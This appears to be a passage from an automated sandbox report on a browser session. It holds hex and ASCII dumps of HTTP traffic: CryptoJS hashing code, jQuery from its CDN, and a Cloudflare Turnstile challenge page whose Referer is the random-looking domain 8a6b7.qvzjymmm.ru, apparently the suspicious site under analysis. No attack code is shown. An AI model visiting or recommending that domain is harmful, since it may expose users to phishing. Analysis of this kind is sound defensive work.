                                  Data Ascii: harAt(64);return!o||-1!==(o=t.indexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%4*2,c=r[t.charCodeAt(o)]>>>6-o%4*2,c=s|c,i[n>>>2]|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNOP
                                  2024-11-25 23:28:23 UTC1369INData Raw: 61 2e 73 69 6e 28 74 2b 31 29 29 7c 30 7d 28 29 3b 65 3d 65 2e 4d 44 35 3d 69 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29 7d 76 61 72 20 6f 3d 74 68 69
                                  Data Ascii: a.sin(t+1))|0}();e=e.MD5=i.extend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8)}var o=thi
                                  2024-11-25 23:28:23 UTC1369INData Raw: 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c 77 2c 31 35 2c 41
                                  Data Ascii: ),m=C(m,b,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,w,15,A


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  8192.168.2.449749151.101.2.1374432484C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2024-11-25 23:28:23 UTC358OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                  Host: code.jquery.com
                                  Connection: keep-alive
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept: */*
                                  Sec-Fetch-Site: none
                                  Sec-Fetch-Mode: cors
                                  Sec-Fetch-Dest: empty
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2024-11-25 23:28:23 UTC613INHTTP/1.1 200 OK
                                  Connection: close
                                  Content-Length: 89501
                                  Server: nginx
                                  Content-Type: application/javascript; charset=utf-8
                                  Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                  ETag: "28feccc0-15d9d"
                                  Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                  Access-Control-Allow-Origin: *
                                  Cross-Origin-Resource-Policy: cross-origin
                                  Via: 1.1 varnish, 1.1 varnish
                                  Accept-Ranges: bytes
                                  Date: Mon, 25 Nov 2024 23:28:23 GMT
                                  Age: 2559378
                                  X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740068-EWR
                                  X-Cache: HIT, HIT
                                  X-Cache-Hits: 5889, 1
                                  X-Timer: S1732577304.601379,VS0,VE1
                                  Vary: Accept-Encoding
                                  2024-11-25 23:28:23 UTC16384INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                  Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                  2024-11-25 23:28:23 UTC16384INData Raw: 2c 64 5d 3b 62 72 65 61 6b 7d 7d 65 6c 73 65 20 69 66 28 70 26 26 28 64 3d 73 3d 28 72 3d 28 69 3d 28 6f 3d 28 61 3d 65 29 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6f 5b 61 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 29 5b 68 5d 7c 7c 5b 5d 29 5b 30 5d 3d 3d 3d 6b 26 26 72 5b 31 5d 29 2c 21 31 3d 3d 3d 64 29 77 68 69 6c 65 28 61 3d 2b 2b 73 26 26 61 26 26 61 5b 6c 5d 7c 7c 28 64 3d 73 3d 30 29 7c 7c 75 2e 70 6f 70 28 29 29 69 66 28 28 78 3f 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 66 3a 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 29 26 26 2b 2b 64 26 26 28 70 26 26 28 28 69 3d 28 6f 3d 61 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c
                                  Data Ascii: ,d];break}}else if(p&&(d=s=(r=(i=(o=(a=e)[S]||(a[S]={}))[a.uniqueID]||(o[a.uniqueID]={}))[h]||[])[0]===k&&r[1]),!1===d)while(a=++s&&a&&a[l]||(d=s=0)||u.pop())if((x?a.nodeName.toLowerCase()===f:1===a.nodeType)&&++d&&(p&&((i=(o=a[S]||(a[S]={}))[a.uniqueID]|
                                  2024-11-25 23:28:24 UTC16384INData Raw: 22 6d 73 2d 22 29 2e 72 65 70 6c 61 63 65 28 7a 2c 55 29 7d 76 61 72 20 56 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 31 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 39 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 21 2b 65 2e 6e 6f 64 65 54 79 70 65 7d 3b 66 75 6e 63 74 69 6f 6e 20 47 28 29 7b 74 68 69 73 2e 65 78 70 61 6e 64 6f 3d 53 2e 65 78 70 61 6e 64 6f 2b 47 2e 75 69 64 2b 2b 7d 47 2e 75 69 64 3d 31 2c 47 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 63 61 63 68 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3b 72 65 74 75 72 6e 20 74 7c 7c 28 74 3d 7b 7d 2c 56 28 65 29 26 26 28 65 2e 6e 6f 64 65 54 79 70 65 3f 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3d 74 3a 4f 62 6a 65 63 74 2e
                                  Data Ascii: "ms-").replace(z,U)}var V=function(e){return 1===e.nodeType||9===e.nodeType||!+e.nodeType};function G(){this.expando=S.expando+G.uid++}G.uid=1,G.prototype={cache:function(e){var t=e[this.expando];return t||(t={},V(e)&&(e.nodeType?e[this.expando]=t:Object.
                                  2024-11-25 23:28:24 UTC16384INData Raw: 72 5d 29 3b 65 6c 73 65 20 4c 65 28 65 2c 63 29 3b 72 65 74 75 72 6e 20 30 3c 28 61 3d 76 65 28 63 2c 22 73 63 72 69 70 74 22 29 29 2e 6c 65 6e 67 74 68 26 26 79 65 28 61 2c 21 66 26 26 76 65 28 65 2c 22 73 63 72 69 70 74 22 29 29 2c 63 7d 2c 63 6c 65 61 6e 44 61 74 61 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6e 2c 72 2c 69 3d 53 2e 65 76 65 6e 74 2e 73 70 65 63 69 61 6c 2c 6f 3d 30 3b 76 6f 69 64 20 30 21 3d 3d 28 6e 3d 65 5b 6f 5d 29 3b 6f 2b 2b 29 69 66 28 56 28 6e 29 29 7b 69 66 28 74 3d 6e 5b 59 2e 65 78 70 61 6e 64 6f 5d 29 7b 69 66 28 74 2e 65 76 65 6e 74 73 29 66 6f 72 28 72 20 69 6e 20 74 2e 65 76 65 6e 74 73 29 69 5b 72 5d 3f 53 2e 65 76 65 6e 74 2e 72 65 6d 6f 76 65 28 6e 2c 72 29 3a 53 2e 72 65 6d 6f 76 65 45 76 65
                                  Data Ascii: r]);else Le(e,c);return 0<(a=ve(c,"script")).length&&ye(a,!f&&ve(e,"script")),c},cleanData:function(e){for(var t,n,r,i=S.event.special,o=0;void 0!==(n=e[o]);o++)if(V(n)){if(t=n[Y.expando]){if(t.events)for(r in t.events)i[r]?S.event.remove(n,r):S.removeEve
                                  2024-11-25 23:28:24 UTC16384INData Raw: 53 2e 65 78 74 65 6e 64 28 7b 61 74 74 72 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 69 2c 6f 3d 65 2e 6e 6f 64 65 54 79 70 65 3b 69 66 28 33 21 3d 3d 6f 26 26 38 21 3d 3d 6f 26 26 32 21 3d 3d 6f 29 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 3f 53 2e 70 72 6f 70 28 65 2c 74 2c 6e 29 3a 28 31 3d 3d 3d 6f 26 26 53 2e 69 73 58 4d 4c 44 6f 63 28 65 29 7c 7c 28 69 3d 53 2e 61 74 74 72 48 6f 6f 6b 73 5b 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 7c 7c 28 53 2e 65 78 70 72 2e 6d 61 74 63 68 2e 62 6f 6f 6c 2e 74 65 73 74 28 74 29 3f 63 74 3a 76 6f 69 64 20 30 29 29 2c 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 75 6c 6c 3d 3d 3d 6e 3f 76 6f 69 64 20 53 2e 72 65 6d
                                  Data Ascii: S.extend({attr:function(e,t,n){var r,i,o=e.nodeType;if(3!==o&&8!==o&&2!==o)return"undefined"==typeof e.getAttribute?S.prop(e,t,n):(1===o&&S.isXMLDoc(e)||(i=S.attrHooks[t.toLowerCase()]||(S.expr.match.bool.test(t)?ct:void 0)),void 0!==n?null===n?void S.rem
                                  2024-11-25 23:28:24 UTC7581INData Raw: 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 69 2e 78 68 72 28 29 3b 69 66 28 72 2e 6f 70 65 6e 28 69 2e 74 79 70 65 2c 69 2e 75 72 6c 2c 69 2e 61 73 79 6e 63 2c 69 2e 75 73 65 72 6e 61 6d 65 2c 69 2e 70 61 73 73 77 6f 72 64 29 2c 69 2e 78 68 72 46 69 65 6c 64 73 29 66 6f 72 28 6e 20 69 6e 20 69 2e 78 68 72 46 69 65 6c 64 73 29 72 5b 6e 5d 3d 69 2e 78 68 72 46 69 65 6c 64 73 5b 6e 5d 3b 66 6f 72 28 6e 20 69 6e 20 69 2e 6d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 28 69 2e 6d 69 6d 65 54 79 70 65 29 2c 69 2e 63 72 6f 73 73 44 6f 6d 61 69 6e 7c 7c 65 5b 22 58 2d 52 65 71 75 65 73 74 65 64 2d 57 69 74 68 22 5d 7c 7c 28 65 5b 22 58 2d 52
                                  Data Ascii: :function(e,t){var n,r=i.xhr();if(r.open(i.type,i.url,i.async,i.username,i.password),i.xhrFields)for(n in i.xhrFields)r[n]=i.xhrFields[n];for(n in i.mimeType&&r.overrideMimeType&&r.overrideMimeType(i.mimeType),i.crossDomain||e["X-Requested-With"]||(e["X-R


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  9192.168.2.449750104.18.94.414432484C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2024-11-25 23:28:25 UTC800OUTGET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/e00u8/0x4AAAAAAA0rtdv_xNXYa5Om/auto/fbE/normal/auto/ HTTP/1.1
                                  Host: challenges.cloudflare.com
                                  Connection: keep-alive
                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                  sec-ch-ua-mobile: ?0
                                  sec-ch-ua-platform: "Windows"
                                  Upgrade-Insecure-Requests: 1
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Sec-Fetch-Site: cross-site
                                  Sec-Fetch-Mode: navigate
                                  Sec-Fetch-Dest: iframe
                                  Referer: https://8a6b7.qvzjymmm.ru/
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2024-11-25 23:28:25 UTC1362INHTTP/1.1 200 OK
                                  Date: Mon, 25 Nov 2024 23:28:25 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 26459
                                  Connection: close
                                  cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                  permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                  content-security-policy: frame-src https://challenges.cloudflare.com/; base-uri 'self'
                                  cross-origin-embedder-policy: require-corp
                                  cross-origin-opener-policy: same-origin
                                  cross-origin-resource-policy: cross-origin
                                  origin-agent-cluster: ?1
                                  accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                  critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                  referrer-policy: same-origin
                                  document-policy: js-profiling
                                  2024-11-25 23:28:25 UTC82INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 65 38 35 36 61 33 65 34 39 62 32 38 63 30 36 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                  Data Ascii: Server: cloudflareCF-RAY: 8e856a3e49b28c06-EWRalt-svc: h3=":443"; ma=86400
                                  2024-11-25 23:28:25 UTC1294INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
                                  Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
                                  2024-11-25 23:28:25 UTC1369INData Raw: 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 73 79 73 74 65 6d 2d 75 69 2c 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 72 6f 62 6f 74 6f 2c 6f 78 79 67 65 6e 2c 75 62 75 6e 74 75 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65
                                  Data Ascii: dding:0;width:100%}.main-wrapper,body{background-color:#fff;color:#232323;font-family:-apple-system,system-ui,blinkmacsystemfont,Segoe UI,roboto,oxygen,ubuntu,Helvetica Neue,arial,sans-serif;font-size:14px;font-weight:400;-webkit-font-smoothing:antialiase
                                  2024-11-25 23:28:25 UTC1369INData Raw: 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 61 6e 69 6d 61 74 69 6f 6e 3a 66 69 72 65 77 6f 72 6b 20 2e 33 73 20 65 61 73 65 2d 6f 75 74 20 31 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 33 32 20 33 32 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 2d 38 7d 23 73 75 63 63 65 73 73 2d 74 65 78 74 7b 61 6e 69 6d 61 74 69 6f 6e 3a 66 61 64 65 2d 69 6e 20 31 73 20 66 6f 72 77 61 72 64 73 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 66 69 6c 6c 3a 23
                                  Data Ascii: stroke:#038127;animation:firework .3s ease-out 1;stroke-width:1;stroke-dasharray:32 32;stroke-dashoffset:-8}#success-text{animation:fade-in 1s forwards;opacity:0}.success-circle{stroke-dashoffset:0;stroke-width:2;stroke-miterlimit:10;stroke:#038127;fill:#
                                  2024-11-25 23:28:25 UTC1369INData Raw: 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 2e 74 68 65 6d 65 2d 64 61 72
                                  Data Ascii: e-dark #challenge-overlay a,.theme-dark #challenge-overlay a:link,.theme-dark #challenge-overlay a:visited{color:#bbb}.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus,.theme-dark #challenge-error-text a:hover,.theme-dar
                                  2024-11-25 23:28:25 UTC1369INData Raw: 32 30 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 66 69 6c 6c 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68
                                  Data Ascii: 20}.theme-dark .logo-text{fill:#fff}.theme-dark #fr-helper-loop-link,.theme-dark #fr-helper-loop-link:link,.theme-dark #fr-helper-loop-link:visited{color:#bbb}.theme-dark #fr-helper-loop-link:active,.theme-dark #fr-helper-loop-link:focus,.theme-dark #fr-h
                                  2024-11-25 23:28:25 UTC1369INData Raw: 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 64 65 31 33 30 33 3b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 61 6e 69 6d 61 74 69 6f 6e 3a 73 74 72 6f 6b 65 20 2e 36 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 66 61 69 6c 75 72 65 2d 63 72 6f 73 73 7b 66 69 6c 6c 3a 23 66 66 66 3b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 62 6f 74 74 6f 6d 20 63 65 6e 74 65 72 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 2d 69 6e 2e 61 6e 69 6d 61 74 69 6f 6e 7b 30 25 7b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 73 74 72 6f 6b 65 3a 23 64 65 31
                                  Data Ascii: ;stroke-dashoffset:166;stroke-width:2;stroke-miterlimit:10;stroke:#de1303;fill:#de1303;animation:stroke .6s cubic-bezier(.65,0,.45,1) forwards}.failure-cross{fill:#fff;transform-origin:bottom center}@keyframes fade-in.animation{0%{fill:#de1303;stroke:#de1
                                  2024-11-25 23:28:25 UTC1369INData Raw: 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 66 6c 6f 77 3a 63 6f 6c 75 6d 6e 20 6e 6f 77 72 61 70 3b 67 61 70 3a 30 3b 68 65 69 67 68 74 3a 31 34 30 70 78 3b 70 61 64 64 69 6e 67 3a 31 32 70 78 20 30 3b 70 6c 61 63 65 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 6c 69 6e 6b 2d 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 33 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 33 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d
                                  Data Ascii: ay:flex;flex-flow:column nowrap;gap:0;height:140px;padding:12px 0;place-content:space-between}.size-compact .link-spacer{margin-left:3px;margin-right:3px}.size-compact .cb-c{margin:0 12px;text-align:left}.size-compact .cb-container{margin:0 12px}.size-com
